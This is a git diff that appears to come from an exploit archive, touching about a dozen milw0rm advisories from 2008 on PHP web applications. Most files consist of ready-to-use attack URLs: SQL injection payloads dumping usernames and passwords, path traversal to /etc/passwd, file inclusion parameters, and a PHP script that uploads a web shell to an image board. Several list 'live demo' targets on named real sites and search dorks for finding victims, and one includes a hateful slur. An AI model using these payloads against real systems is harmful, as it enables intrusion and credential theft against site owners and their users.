+########################
+
+#########################################################################################################
+#########################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
+#########################################################################################################
+#########################################################################################################
+
+# milw0rm.com [2008-10-07]
diff --git a/platforms/php/webapps/6696.txt b/platforms/php/webapps/6696.txt
index 0b73f3168..fd06fdbbf 100755
--- a/platforms/php/webapps/6696.txt
+++ b/platforms/php/webapps/6696.txt
@@ -1,37 +1,37 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL Injection Vulnerability
-##
-## PHP Auto's V2.9.1 ( searchresults.php catid )
-##
-## http://www.phpautos.com/
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ReaL-HaCk.NeT
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRIAN Arab HACkErS
-########################
-########################
-##
-## -[[: Exploite :]]-
-##
-## www.TraGeT./searchresults.php?catid=-1'/**/UNION/**/SELECT/**/0,0,CONCAT_WS(0x3a,username,password,email)MrSQL,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+tblusers/*
-##
-########################
-########################
-
-#########################################################################################################
-#########################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
-:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
-#########################################################################################################
-#########################################################################################################
-
-# milw0rm.com [2008-10-07]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL Injection Vulnerability
+##
+## PHP Auto's V2.9.1 ( searchresults.php catid )
+##
+## http://www.phpautos.com/
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &  WwW.ReaL-HaCk.NeT
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRIAN Arab HACkErS
+########################
+########################
+##
+## -[[: Exploite :]]-
+##
+## www.TraGeT./searchresults.php?catid=-1'/**/UNION/**/SELECT/**/0,0,CONCAT_WS(0x3a,username,password,email)MrSQL,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+tblusers/*
+##
+########################
+########################
+
+#########################################################################################################
+#########################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
+#########################################################################################################
+#########################################################################################################
+
+# milw0rm.com [2008-10-07]
diff --git a/platforms/php/webapps/6697.txt b/platforms/php/webapps/6697.txt
index a1f3d2a7f..4a4507245 100755
--- a/platforms/php/webapps/6697.txt
+++ b/platforms/php/webapps/6697.txt
@@ -1,36 +1,36 @@
-[~]-----------------------------------------------------------------------------
-[~] Built2Go PHP RealEstate v1.5 (event_detail.php) - SQL Injection Vulnerability
-[~]
-[~] [A professional real estate listings website.
-[~] Lists homes for sale and apartments for rent,
-[~] and provides a powerful search similar to the professional realtor websites.
-[~] Allow visitors to list for free, or enforce free or paid registrations.]
-[~] Price :- $69.95
-[~] http://www.hotscripts.com/Detailed/59295.html
-[~] ----------------------------------------------------------
-[~] Bug founded by d3v1l
-[~]
-[~] Date: 07.10.2008
-[~]
-[~]
-[~] d3v1l@spoofer.com  http://security-sh3ll.com
-[~]
-[~] -----------------------------------------------------------
-[~] Greetz tO ALL:-
-[~]
-[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
-[~]
-[~] Pentest
-[~]-------------------------------------------------------------
-[~] Exploit :-
-[~]
-[~] http://site.com/event_detail.php?event_id=-1 UNION SELECT
-1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
-[~]
-[~] Demo :-
-[~]
-[~] http://www.agrents.com/event_detail.php?event_id=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
-[~]
-[~]--------------------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-10-07]
+[~]-----------------------------------------------------------------------------
+[~] Built2Go PHP RealEstate v1.5 (event_detail.php) - SQL Injection Vulnerability
+[~]
+[~] [A professional real estate listings website.
+[~] Lists homes for sale and apartments for rent,
+[~] and provides a powerful search similar to the professional realtor websites.
+[~] Allow visitors to list for free, or enforce free or paid registrations.]
+[~] Price :- $69.95
+[~] http://www.hotscripts.com/Detailed/59295.html
+[~] ----------------------------------------------------------
+[~] Bug founded by d3v1l
+[~]
+[~] Date: 07.10.2008
+[~]
+[~]
+[~] d3v1l@spoofer.com  http://security-sh3ll.com
+[~]
+[~] -----------------------------------------------------------
+[~] Greetz tO ALL:-
+[~]
+[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
+[~]
+[~] Pentest
+[~]-------------------------------------------------------------
+[~] Exploit :-
+[~]
+[~] http://site.com/event_detail.php?event_id=-1 UNION SELECT
+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
+[~]
+[~] Demo :-
+[~]
+[~] http://www.agrents.com/event_detail.php?event_id=-1 UNION SELECT 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
+[~]
+[~]--------------------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-10-07]
diff --git a/platforms/php/webapps/6700.txt b/platforms/php/webapps/6700.txt
index e3f502762..97f061a3c 100755
--- a/platforms/php/webapps/6700.txt
+++ b/platforms/php/webapps/6700.txt
@@ -1,13 +1,13 @@
-# DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities
-# Script :http://opensource.datafeedfile.com/download/DFF_PHP_FrameworkAPI-latest.zip
-# Exploits :
-#         /DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=
-#         /DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=
-#         /DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=
-#         /DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=
-#         /DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=
-#         /DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=
-#         /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=
-# Tryag.cc/cc
-
-# milw0rm.com [2008-10-08]
+# DFF PHP Framework API (Data Feed File) Multiple Inclusion Vulnerabilities
+# Script :http://opensource.datafeedfile.com/download/DFF_PHP_FrameworkAPI-latest.zip
+# Exploits :
+#         /DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=
+#         /DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=
+#         /DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=
+#         /DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=
+#         /DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=
+#         /DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=
+#         /DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=
+# Tryag.cc/cc
+
+# milw0rm.com [2008-10-08]
diff --git a/platforms/php/webapps/6701.txt b/platforms/php/webapps/6701.txt
index 5e430642f..1850092fa 100755
--- a/platforms/php/webapps/6701.txt
+++ b/platforms/php/webapps/6701.txt
@@ -1,68 +1,68 @@
-                         ||          ||   | ||        
-                  o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                 ( :   /    (_)    /           (   .  
-                  ==================================
-                     ============================
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact :  t3tto0 [at] yahoo.com
-
-                 cyb3r-1st [at] hotmail.com
-
-<> Groups : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection ++++++++++++++
-=======================================================
-
-
-<<->> script   : textlinksads
-
-<<->> download : www.hispah.com/demos/textlinksads 
-
-
-=======================================================
-++++++++++++++++ pwning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>>>>>>>>
-
-           for admin inf0 ::: 
-       >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+admin_detail/*
-
-         for members inf0 ::: 
-       >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+reguser/*
-
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
-                          anaconda-ksa $ sirus $ crazy-x $ spk  and all freinds
-
-<<->> InjEctOr5 TeaM  
-
-
-<<->> All muslims
-
-# milw0rm.com [2008-10-08]
+                         ||          ||   | ||        
+                  o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                 ( :   /    (_)    /           (   .  
+                  ==================================
+                     ============================
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact :  t3tto0 [at] yahoo.com
+
+                 cyb3r-1st [at] hotmail.com
+
+<> Groups : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection ++++++++++++++
+=======================================================
+
+
+<<->> script   : textlinksads
+
+<<->> download : www.hispah.com/demos/textlinksads 
+
+
+=======================================================
+++++++++++++++++ pwning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>>>>>>>>
+
+           for admin inf0 ::: 
+       >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+admin_detail/*
+
+         for members inf0 ::: 
+       >>>>>>>>>>>>>>>>>>>>>>>> www.site.me/index.php?action=buy&idcat=9999999'+union+select+0,concat(username,0x3a,password)+from+reguser/*
+
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker 
+                          anaconda-ksa $ sirus $ crazy-x $ spk  and all freinds
+
+<<->> InjEctOr5 TeaM  
+
+
+<<->> All muslims
+
+# milw0rm.com [2008-10-08]
diff --git a/platforms/php/webapps/6702.txt b/platforms/php/webapps/6702.txt
index a9ea51a2e..1ccb90351 100755
--- a/platforms/php/webapps/6702.txt
+++ b/platforms/php/webapps/6702.txt
@@ -1,20 +1,20 @@
-############### >>> Remote SQL Injection <<<  ###########
-##    SuB-ZeRo(Walid)                                                              ##
-################## >>> SuB-ZeRo  <<< ################
- author  :  SuB-ZeRo(algeria hackers)
- contact :  FbH@hotmail.com
-                
- 
- buy script : http://www.formfields.com/adManArea/adManPricing.php
-dork    : find it
- exploit:
- www.site.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
- L!Ve DeMo  :::
- http://www.formfields.com/adManArea/adMan1/adMan/advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
- NoTe:YoU must singup and login in web sit and you put your exploit
-########### Greetz #############
->>> SuB-ZeRo
->>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4
->>> all muslims
-
-# milw0rm.com [2008-10-08]
+############### >>> Remote SQL Injection <<<  ###########
+##    SuB-ZeRo(Walid)                                                              ##
+################## >>> SuB-ZeRo  <<< ################
+ author  :  SuB-ZeRo(algeria hackers)
+ contact :  FbH@hotmail.com
+                
+ 
+ buy script : http://www.formfields.com/adManArea/adManPricing.php
+dork    : find it
+ exploit:
+ www.site.me/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
+ L!Ve DeMo  :::
+ http://www.formfields.com/adManArea/adMan1/adMan/advertiser/editCampaign.php?campaignId=-2'+union+select+concat(password,0x3a,username)+from+adman_users/*
+ NoTe:YoU must singup and login in web sit and you put your exploit
+########### Greetz #############
+>>> SuB-ZeRo
+>>>my best freinds :: x.CJP.X & ach2008 & carlos the jackel & HiSoK4
+>>> all muslims
+
+# milw0rm.com [2008-10-08]
diff --git a/platforms/php/webapps/6703.txt b/platforms/php/webapps/6703.txt
index 512fbeddd..d54fc0331 100755
--- a/platforms/php/webapps/6703.txt
+++ b/platforms/php/webapps/6703.txt
@@ -1,23 +1,23 @@
- _____   ____   __   __     _       ____        ____    ____ 
-|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
-  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
-  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
-  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
-                                                            
-
-WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Multiple Remote Vulnerabilities
-Script : http://webbiscuits.com/download/all11.zip
-I- Remote File Inclusion Vulnerability
-http://xx.com/adminhead.php?path[docroot]=020.txt
-And More Files ....
-II- Remote File Disclosure Vulnerability
-http://xx.com/faqsupport/wce.download.php?download=../../../../../../../../../../../../../etc/passwd
-   
-        ____           _           _           __  __ 
-       / ___|   ___   | |       __| |         |  \/  |
-      | |  _   / _ \  | |      / _` |         | |\/| |
-      | |_| | | (_) | | |___  | (_| |         | |  | |
-       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
-                                      |_____|         
-
-# milw0rm.com [2008-10-08]
+ _____   ____   __   __     _       ____        ____    ____ 
+|_   _| |  _ \  \ \ / /    / \     / ___|      / ___|  / ___|
+  | |   | |_) |  \ V /    / _ \   | |  _      | |     | |    
+  | |   |  _ <    | |    / ___ \  | |_| |  _  | |___  | |___ 
+  |_|   |_| \_\   |_|   /_/   \_\  \____| (_)  \____|  \____|
+                                                            
+
+WebBiscuits Modules Controller <= 1.1 (RFI/RFD) Multiple Remote Vulnerabilities
+Script : http://webbiscuits.com/download/all11.zip
+I- Remote File Inclusion Vulnerability
+http://xx.com/adminhead.php?path[docroot]=020.txt
+And More Files ....
+II- Remote File Disclosure Vulnerability
+http://xx.com/faqsupport/wce.download.php?download=../../../../../../../../../../../../../etc/passwd
+   
+        ____           _           _           __  __ 
+       / ___|   ___   | |       __| |         |  \/  |
+      | |  _   / _ \  | |      / _` |         | |\/| |
+      | |_| | | (_) | | |___  | (_| |         | |  | |
+       \____|  \___/  |_____|  \__,_|  _____  |_|  |_|
+                                      |_____|         
+
+# milw0rm.com [2008-10-08]
diff --git a/platforms/php/webapps/6706.php b/platforms/php/webapps/6706.php
index 6e90c99a1..6cd0b351d 100755
--- a/platforms/php/webapps/6706.php
+++ b/platforms/php/webapps/6706.php
@@ -1,65 +1,65 @@
-
-
-After execution:
-http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print "Hello";
-http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello
-**********************************/
-
-$shellname = 'oekaki.php'; // any filename ending in php
-$server = 'http://www.kusaba.image.board/url/'; // BBS website, with
-trailing slash
-$image = file_get_contents('test.jpg'); // image to upload (any valid
-picture)
-$magicquotes = true;
-
-if ($magicquotes)
-{
-	$shellcode = << 'what this is for',
-);
-
-function build_data($adata)
-{
-	$data = '';
-	foreach ($adata as $k => $v)
-	{
-		$data .= "$k=$v;";
-	}
-	return substr($data,0,-1);
-}
-
-function data_len($data)
-{
-	return str_pad(strlen($data),8,'0',STR_PAD_LEFT);
-}
-
-$request = new
-HttpRequest($server.'paint_save.php?applet=shipainter&saveid='.$shellname.'%00',HttpRequest::METH_POST);
-$data = build_data($adata);
-$imagedata = $image;
-$animationdata = $shellcode;
-$request->setRawPostData("S".data_len($data).$data.data_len($imagedata).'xx'.$imagedata.data_len($animationdata).$animationdata);
-
-echo $request->send()->getBody();
-
-# milw0rm.com [2008-10-09]
+
+
+After execution:
+http://www.kusaba.image.board/url/kasubaoek/oekaki.php?pc=print "Hello";
+http://www.kusaba.image.board/url/kasubaoek/oekaki.php?sc=echo Hello
+**********************************/
+
+$shellname = 'oekaki.php'; // any filename ending in php
+$server = 'http://www.kusaba.image.board/url/'; // BBS website, with
+trailing slash
+$image = file_get_contents('test.jpg'); // image to upload (any valid
+picture)
+$magicquotes = true;
+
+if ($magicquotes)
+{
+	$shellcode = << 'what this is for',
+);
+
+function build_data($adata)
+{
+	$data = '';
+	foreach ($adata as $k => $v)
+	{
+		$data .= "$k=$v;";
+	}
+	return substr($data,0,-1);
+}
+
+function data_len($data)
+{
+	return str_pad(strlen($data),8,'0',STR_PAD_LEFT);
+}
+
+$request = new
+HttpRequest($server.'paint_save.php?applet=shipainter&saveid='.$shellname.'%00',HttpRequest::METH_POST);
+$data = build_data($adata);
+$imagedata = $image;
+$animationdata = $shellcode;
+$request->setRawPostData("S".data_len($data).$data.data_len($imagedata).'xx'.$imagedata.data_len($animationdata).$animationdata);
+
+echo $request->send()->getBody();
+
+# milw0rm.com [2008-10-09]
diff --git a/platforms/php/webapps/6707.txt b/platforms/php/webapps/6707.txt
index c6b42a4ac..e4cb16986 100755
--- a/platforms/php/webapps/6707.txt
+++ b/platforms/php/webapps/6707.txt
@@ -1,16 +1,15 @@
-
-
-Gforge <= 4.5.19 Multiple Sql Injections
-
-Vendor Notified: 2008-10-06
-Note: should work regardless magic_quotes_gpc setting.
-
-http://gforgesite.xxx/new/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary
-http://gforgesite.xxx/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
-http://gforgesite.xxx/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;
-
-Replace 1337 with a valid group_id:
-
-http://gforgesite.xxx/frs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*
-
-# milw0rm.com [2008-10-09]
+
+Gforge <= 4.5.19 Multiple Sql Injections
+
+Vendor Notified: 2008-10-06
+Note: should work regardless magic_quotes_gpc setting.
+
+http://gforgesite.xxx/new/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary
+http://gforgesite.xxx/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
+http://gforgesite.xxx/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;
+
+Replace 1337 with a valid group_id:
+
+http://gforgesite.xxx/frs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*
+
+# milw0rm.com [2008-10-09]
diff --git a/platforms/php/webapps/6708.txt b/platforms/php/webapps/6708.txt
index 30eaae387..c2443d171 100755
--- a/platforms/php/webapps/6708.txt
+++ b/platforms/php/webapps/6708.txt
@@ -1,12 +1,11 @@
-
-Gforge <= 4.6 rc1 skill_edit SQL injection
-
-Vendor Notified: 2008-10-06 
-Impact: zomg!
-Note: should work regardless magic_quotes_gpc setting.
-Requires: Creating an account and be logged in
-Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php
-
-http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit
-
-# milw0rm.com [2008-10-09]
+Gforge <= 4.6 rc1 skill_edit SQL injection
+
+Vendor Notified: 2008-10-06 
+Impact: zomg!
+Note: should work regardless magic_quotes_gpc setting.
+Requires: Creating an account and be logged in
+Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php
+
+http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit
+
+# milw0rm.com [2008-10-09]
diff --git a/platforms/php/webapps/6709.txt b/platforms/php/webapps/6709.txt
index 955609a8b..91233a419 100755
--- a/platforms/php/webapps/6709.txt
+++ b/platforms/php/webapps/6709.txt
@@ -1,51 +1,51 @@
-################################################################ 
-#       .___             __          _______       .___        # 
-#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
-#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
-#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
-#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
-#        \/                  \/             \/                 # 
-#                   ___________   ______  _  __                # 
-#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
-#                 \  \___|  | \/\  ___/\     /                 # 
-#                  \___  >__|    \___  >\/\_/                  # 
-#      est.2007        \/            \/   forum.darkc0de.com   # 
-################################################################ 
-#  d3hydr8 - rsauron - baltazar - C1c4Tr1Z - beenu - P47tr1ck  # 
-#                  and all darkc0de  members                   # 
-################################################################ 
-# 
-# Author: rsauron 
-# 
-# Home  : www.darkc0de.com
-# 
-# Email : rsauron@gmail.com 
-# 
-# Share the c0de! 
-# 
-################################################################ 
-# 
-# Type: Joomla Component com_joomtracker Remote SQL Injection Vulnerability
-#
-# Title: Joomtracker XBT external bittorrent tracker
-#
-# Vendor: http://www.joomtracker.org/
-# 
-################################################################ 
-#
-# d0rk: "Powered by Joomtracker"
-#
-################################################################  
-     POC :- 
-	
-	index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/*       
-   
-     Live Demo: 
-	
-	http://www.joomtracker.org/index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/*
-	
-################################################################ 
-#  Bug discovered : 08 Oct.2008
-################################################################
-
-# milw0rm.com [2008-10-09]
+################################################################ 
+#       .___             __          _______       .___        # 
+#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
+#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
+#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
+#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
+#        \/                  \/             \/                 # 
+#                   ___________   ______  _  __                # 
+#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
+#                 \  \___|  | \/\  ___/\     /                 # 
+#                  \___  >__|    \___  >\/\_/                  # 
+#      est.2007        \/            \/   forum.darkc0de.com   # 
+################################################################ 
+#  d3hydr8 - rsauron - baltazar - C1c4Tr1Z - beenu - P47tr1ck  # 
+#                  and all darkc0de  members                   # 
+################################################################ 
+# 
+# Author: rsauron 
+# 
+# Home  : www.darkc0de.com
+# 
+# Email : rsauron@gmail.com 
+# 
+# Share the c0de! 
+# 
+################################################################ 
+# 
+# Type: Joomla Component com_joomtracker Remote SQL Injection Vulnerability
+#
+# Title: Joomtracker XBT external bittorrent tracker
+#
+# Vendor: http://www.joomtracker.org/
+# 
+################################################################ 
+#
+# d0rk: "Powered by Joomtracker"
+#
+################################################################  
+     POC :- 
+	
+	index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/*       
+   
+     Live Demo: 
+	
+	http://www.joomtracker.org/index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/*
+	
+################################################################ 
+#  Bug discovered : 08 Oct.2008
+################################################################
+
+# milw0rm.com [2008-10-09]
diff --git a/platforms/php/webapps/6710.txt b/platforms/php/webapps/6710.txt
index cad3cadfc..d0fcdee15 100755
--- a/platforms/php/webapps/6710.txt
+++ b/platforms/php/webapps/6710.txt
@@ -1,16 +1,16 @@
-Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
-Script:Cameralife 2.6.2b4
-Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip
-Author:BackDoor
-Bug 1;album.php Remote SQL Injection Vulnerability
-Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
-Live
-http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
-Bug 2;topic.php XSS Vulnerability
-Exploit:www.target.com/scriptpath/topic.php?name=">
-Live
-http://chrisnolan.org/cameralife/topic.php?name=">
-Dork:inurl:"cameralife/index.php"
-BackDoor Cyber-Security.TIM //Lojistik
-
-# milw0rm.com [2008-10-09]
+Cameralife 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities
+Script:Cameralife 2.6.2b4
+Download:http://nchc.dl.sourceforge.net/sourceforge/fdcl/cameralife-2.6.2b4.zip
+Author:BackDoor
+Bug 1;album.php Remote SQL Injection Vulnerability
+Exploit:www.target.com/scriptpath/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
+Live
+http://chrisnolan.org/cameralife/album.php?id=-1+union+select+0,password,username,3,4,5+from+users
+Bug 2;topic.php XSS Vulnerability
+Exploit:www.target.com/scriptpath/topic.php?name=">
+Live
+http://chrisnolan.org/cameralife/topic.php?name=">
+Dork:inurl:"cameralife/index.php"
+BackDoor Cyber-Security.TIM //Lojistik
+
+# milw0rm.com [2008-10-09]
diff --git a/platforms/php/webapps/6712.txt b/platforms/php/webapps/6712.txt
index 74d283d17..b6879f6cf 100755
--- a/platforms/php/webapps/6712.txt
+++ b/platforms/php/webapps/6712.txt
@@ -1,45 +1,45 @@
-|___________________________________________________|
-|
-| Arad Center  (news.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------    Hussin X  -------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|                                                                                                     |
-|
-| script : http://www.iranmc.com/shop.php
-|
-| DorK   : "Designed & Developed by N.E.T E-Commerce Group. All Rights Reserved."
-|___________________________________________________|
-
-Exploit: 
-________
-
-
-
-www.[target].com/Script/news.php?id=-1+union+select+0,0,concat(user,0x3e,pass),4+from+user--
-
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
-|_____________________________________________________________________
-
-
